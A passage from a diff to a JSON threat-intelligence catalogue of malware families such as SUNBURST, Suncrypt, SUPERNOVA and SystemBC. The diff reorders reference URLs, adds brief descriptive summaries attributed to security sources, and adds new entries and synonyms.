"https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/", + "https://netresec.com/?b=2113a6a", + "https://netresec.com/?b=212a6ad", + "https://labs.sentinelone.com/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/", + "https://www.netresec.com/?page=Blog&month=2020-12&post=Extracting-Security-Products-from-SUNBURST-DNS-Beacons", + "https://twitter.com/0xrb/status/1339199268146442241", + "https://notes.netbytesec.com/2021/01/solarwinds-attack-sunbursts-dll.html", + "https://www.youtube.com/watch?v=dV2QTLSecpc", + "https://us-cert.cisa.gov/remediating-apt-compromised-networks", + "https://unit42.paloaltonetworks.com/atoms/solarphoenix/", + "https://www.mandiant.com/resources/unc2452-merged-into-apt29", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/center-for-threat-informed-defense/public-resources/master/solorigate/UNC2452.json", + "https://www.mimecast.com/incident-report/", + "https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/", + "https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306", + "https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095", + "https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html", + "https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack", + "https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data", + "https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug", + "https://www.cadosecurity.com/post/responding-to-solarigate", + "https://www.youtube.com/watch?v=GfbxHy6xnbA", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/additional-analysis-into-the-sunburst-backdoor/", + "https://us-cert.cisa.gov/sites/default/files/publications/SolarWinds_and_AD-M365_Compromise-Detecting_APT_Activity_from_Known_TTPs.pdf", + "https://github.com/SentineLabs/SolarWinds_Countermeasures", + "https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/", + "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/", + "https://www.solarwinds.com/securityadvisory/faq", + "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more", + "https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/", + "https://www.cisa.gov/supply-chain-compromise", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q", "https://twitter.com/cybercdh/status/1339241246024404994", - "https://thenewstack.io/behind-the-scenes-of-the-sunburst-attack/", + "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf", + "https://github.com/fireeye/Mandiant-Azure-AD-Investigator", + "https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a", + "https://www.mandiant.com/media/10916/download", + "https://www.microsoft.com/security/blog/2021/02/25/microsoft-open-sources-codeql-queries-used-to-hunt-for-solorigate-activity/", + "https://youtu.be/Ta_vatZ24Cs?t=59", + "https://www.ironnet.com/blog/solarwinds/sunburst-behavioral-analytics-and-collective-defense-in-action", "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware", "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach", - "https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst", - "https://unit42.paloaltonetworks.com/atoms/solarphoenix/", - "https://securelist.com/sunburst-backdoor-kazuar/99981/", - "https://www.domaintools.com/resources/blog/unraveling-network-infrastructure-linked-to-the-solarwinds-hack" + "https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "https://us-cert.cisa.gov/ncas/alerts/aa20-352a", + "https://github.com/github/codeql/tree/main/csharp/ql/src/experimental/Security%20Features/campaign", + "https://www.bleepingcomputer.com/news/security/fireeye-microsoft-create-kill-switch-for-solarwinds-backdoor/", + "https://blog.cloudflare.com/solarwinds-orion-compromise-trend-data/", + "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline", + "https://www.brighttalk.com/webcast/7451/462719", + "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718", + "https://www.brighttalk.com/webcast/7451/469525", + "https://github.com/fireeye/sunburst_countermeasures", + "https://news.sophos.com/en-us/2020/12/14/solarwinds-playbook/", + "https://twitter.com/lordx64/status/1338526166051934213", + "https://www.domaintools.com/resources/blog/unraveling-network-infrastructure-linked-to-the-solarwinds-hack", + "https://youtu.be/SW8kVkwDOrc?t=24706", + "https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html", + "https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html", + "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate", + "https://github.com/sophos-cybersecurity/solarwinds-threathunt", + "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/", + "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610", + "https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling", + "https://www.mimecast.com/blog/important-security-update/", + "https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response", + "https://www.comae.com/posts/sunburst-memory-analysis/", + "https://www.bleepingcomputer.com/news/security/mimecast-links-security-breach-to-solarwinds-hackers/", + "https://www.nato.int/cps/en/natolive/official_texts_183168.htm?selectedLocale=en", + "https://www.solarwinds.com/securityadvisory", + "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", + "https://blog.gigamon.com/2021/07/27/ghosts-on-the-wire-expanding-conceptions-of-network-anomalies/", + "https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/", + "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html", + "https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards", + "https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html", + "https://www.youtube.com/watch?v=cMauHTV-lJg", + "https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/", + "https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-unique-dga", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a", + "https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident", + "https://www.elastic.co/blog/supervised-and-unsupervised-machine-learning-for-dga-detection", + "https://www.youtube.com/watch?v=-Vsgmw2G4Wo", + "https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update", + "https://www.netresec.com/?page=Blog&month=2020-12&post=Reassembling-Victim-Domain-Fragments-from-SUNBURST-DNS", + "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html", + "https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947", + "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/" ], "synonyms": [ "Solorigate" @@ -46082,33 +48246,33 @@ "value": "SUNBURST" }, { - "description": "", + "description": "According to PCrisk, Suncrypt ransomware prevents victims from accessing files by encryption. It also renames all encrypted files and creates a ransom message. It renames encrypted files by appending a string of random characters as the new extension.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", - "https://www.tesorion.nl/en/posts/shining-a-light-on-suncrypts-curious-file-encryption-mechanism/", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", - "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a", + "https://medium.com/s2wlab/case-analysis-of-suncrypt-ransomware-negotiation-and-bitcoin-transaction-43a2194ac0bc", + "https://pcsxcetrasupport3.wordpress.com/2021/03/28/suncrypt-powershell-obfuscation-shellcode-and-more-yara/", "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a", + "https://blog.minerva-labs.com/suncrypt-ransomware-gains-new-abilities-in-2022", + "https://www.tesorion.nl/en/posts/shining-a-light-on-suncrypts-curious-file-encryption-mechanism/", "https://medium.com/@sapphirex00/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-is-still-alive-and-kicking-in-2022/", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://cdn.pathfactory.com/assets/10555/contents/394789/0dd521f8-aa64-4517-834e-bc852e9ab95d.pdf", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-is-still-alive-and-kicking-in-2022/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", - "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", - "https://pcsxcetrasupport3.wordpress.com/2021/03/28/suncrypt-powershell-obfuscation-shellcode-and-more-yara/", - "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/", - "https://medium.com/s2wlab/case-analysis-of-suncrypt-ransomware-negotiation-and-bitcoin-transaction-43a2194ac0bc", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html", "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/", - "https://blog.minerva-labs.com/suncrypt-ransomware-gains-new-abilities-in-2022" + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/" ], "synonyms": [], "type": [] @@ -46121,8 +48285,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal", - "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", + "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html" ], "synonyms": [], "type": [] @@ -46135,8 +48299,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunseed", - "https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails", - "https://blogs.blackberry.com/en/2022/03/threat-thursday-sunseed-malware" + "https://blogs.blackberry.com/en/2022/03/threat-thursday-sunseed-malware", + "https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails" ], "synonyms": [], "type": [] @@ -46146,32 +48310,45 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.superbear", + "https://0x0v1.com/posts/superbear/superbear/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a6ca0a04-359d-4f7a-b556-46b33ec75473", + "value": "SuperBear RAT" + }, + { + "description": "According to CISA, SUPERNOVA is a malicious webshell backdoor that allows a remote operator to dynamically inject C# source code into a web portal to subsequently inject code. APT actors use SUPERNOVA to perform reconnaissance, conduct domain mapping, and steal sensitive information and credentials. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.supernova", "https://www.youtube.com/watch?v=7WX5fCEzTlA", - "https://twitter.com/MalwareRE/status/1342888881373503488", "https://github.com/fireeye/sunburst_countermeasures/pull/5", - "https://www.solarwinds.com/securityadvisory/faq", - "https://github.com/fireeye/sunburst_countermeasures", - "https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", - "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", - "https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/", - "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a", - "https://unit42.paloaltonetworks.com/solarstorm-supernova", - "https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html", - "https://www.splunk.com/en_us/blog/security/supernova-redux-with-a-generous-portion-of-masquerading.html", - "https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group", - "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", - "https://unit42.paloaltonetworks.com/solarstorm-supernova/", - "https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.sentinelone.com/labs/solarwinds-understanding-detecting-the-supernova-webshell-trojan", + "https://github.com/fireeye/sunburst_countermeasures", + "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", + "https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group", + "https://twitter.com/MalwareRE/status/1342888881373503488", + "https://unit42.paloaltonetworks.com/solarstorm-supernova/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", + "https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html", "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", - "https://www.anquanke.com/post/id/226029", - "https://www.solarwinds.com/securityadvisory" + "https://www.solarwinds.com/securityadvisory/faq", + "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", + "https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://www.solarwinds.com/securityadvisory", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a", + "https://www.splunk.com/en_us/blog/security/supernova-redux-with-a-generous-portion-of-masquerading.html", + "https://www.sentinelone.com/labs/solarwinds-understanding-detecting-the-supernova-webshell-trojan", + "https://unit42.paloaltonetworks.com/solarstorm-supernova", + "https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis", + "https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/", + "https://www.anquanke.com/post/id/226029" ], "synonyms": [], "type": [] @@ -46184,11 +48361,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox", - "https://www.symantec.com/connect/blogs/trojanbayrob-strikes-again-1", "https://www.justice.gov/opa/pr/two-romanian-cybercriminals-convicted-all-21-counts-relating-infecting-over-400000-victim", + "https://blog.avast.com/2013/06/18/your-facebook-connection-is-now-secured/", "https://www.symantec.com/connect/blogs/bayrob-three-suspects-extradited-face-charges-us", + "https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf", "https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf", - "https://media.blackhat.com/us-13/US-13-Geffner-End-To-End-Analysis-of-a-Domain-Generating-Algorithm-Malware-Family-WP.pdf" + "https://www.symantec.com/connect/blogs/trojanbayrob-strikes-again-1" ], "synonyms": [ "Bayrob", @@ -46200,7 +48378,7 @@ "value": "SuppoBox" }, { - "description": "", + "description": "According to PCrisk, Surtr is ransomware. Malware of this type encrypts files (and renames them) and generates a ransom note. Surtr appends the decryptmydata@mailfence.com email address and the \".SURT\" extension to filenames.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.surtr", @@ -46213,7 +48391,7 @@ "value": "surtr" }, { - "description": "", + "description": "According to PCrisk, SVCReady collects information about the infected system such as username, computer name, time zone, computer manufacturer, BIOS, and firmware. Also, it gathers lists of running processes and installed software. SVCReady sends collected data to the C2 server. Additionally, SVCReady attempts to maintain its foothold on the system by creating a scheduled task.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.svcready", @@ -46240,13 +48418,13 @@ "value": "swen" }, { - "description": "According to ESET, this is a wiper written in Go, that was deployed against an Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victim’s Active Directory environment.", + "description": "According to ESET, this is a wiper written in Go, that was deployed against an Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victim\u2019s Active Directory environment.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.swiftslicer", "https://www.welivesecurity.com/2023/01/27/swiftslicer-new-destructive-wiper-malware-ukraine/", - "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", - "https://twitter.com/ESETresearch/status/1618960022150729728" + "https://twitter.com/ESETresearch/status/1618960022150729728", + "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf" ], "synonyms": [ "JaguarBlade" @@ -46274,13 +48452,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot", - "https://www.symantec.com/connect/blogs/sykipot-attacks", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-edison", - "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", + "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", "https://community.rsa.com/thread/185437", - "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", + "https://www.secureworks.com/research/threat-profiles/bronze-edison", + "https://www.symantec.com/connect/blogs/sykipot-attacks" ], "synonyms": [ "Wkysol", @@ -46296,8 +48474,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack", - "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/", - "https://therecord.media/synack-ransomware-gang-releases-decryption-keys-for-old-victims/" + "https://therecord.media/synack-ransomware-gang-releases-decryption-keys-for-old-victims/", + "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" ], "synonyms": [], "type": [] @@ -46348,9 +48526,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/" + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf" ], "synonyms": [], "type": [] @@ -46364,8 +48542,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon", "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/", - "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/", - "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/" ], "synonyms": [], "type": [] @@ -46407,12 +48585,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.syskit", - "https://twitter.com/QW5kcmV3/status/1176861114535165952", - "https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media", - "https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897", - "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/", + "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html", "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain", - "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html" + "https://twitter.com/QW5kcmV3/status/1176861114535165952", + "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/", + "https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media", + "https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897" ], "synonyms": [ "IvizTech", @@ -46444,8 +48622,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysrv_hello", - "https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/", - "https://darktrace.com/blog/worm-like-propagation-of-sysrv-hello-crypto-jacking-botnet" + "https://darktrace.com/blog/worm-like-propagation-of-sysrv-hello-crypto-jacking-botnet", + "https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/" ], "synonyms": [], "type": [] @@ -46470,32 +48648,46 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc", - "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders", - "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", - "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", - "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", - "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/", - "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis", - "https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.bitsight.com/blog/emotet-botnet-rises-again", - "https://news.sophos.com/en-us/2020/12/16/systembc/", - "https://community.riskiq.com/article/47766fbd", - "https://www.bitsight.com/blog/systembc-multipurpose-proxy-bot-still-breathes", - "https://www.mandiant.com/resources/chasing-avaddon-ransomware", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf", "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6", - "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis", - "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/", - "https://asec.ahnlab.com/en/33600/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", - "https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/", + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader", + "https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", + "https://www.bitsight.com/blog/systembc-multipurpose-proxy-bot-still-breathes", "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a" + "https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf", + "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis", + "https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/", + "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc/", + "https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits", + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-lack-of-antivirus-support-opens-the-door-to-adversaries/", + "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders", + "https://asec.ahnlab.com/en/33600/", + "https://docs.velociraptor.app/exchange/artifacts/pages/systembc/", + "https://community.riskiq.com/article/47766fbd", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a", + "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/", + "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis", + "https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", + "https://cyber.wtf/2023/02/09/defeating-vmprotects-latest-tricks/", + "https://www.mandiant.com/resources/chasing-avaddon-ransomware", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.reliaquest.com/blog/gootloader-infection-credential-access/", + "https://news.sophos.com/en-us/2020/12/16/systembc/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy", + "https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/", + "https://www.bitsight.com/blog/emotet-botnet-rises-again", + "https://securelist.com/focus-on-droxidat-systembc/110302/", + "https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor" ], "synonyms": [ - "Coroxy" + "Coroxy", + "DroxiDat" ], "type": [] }, @@ -46507,10 +48699,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi", - "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel", 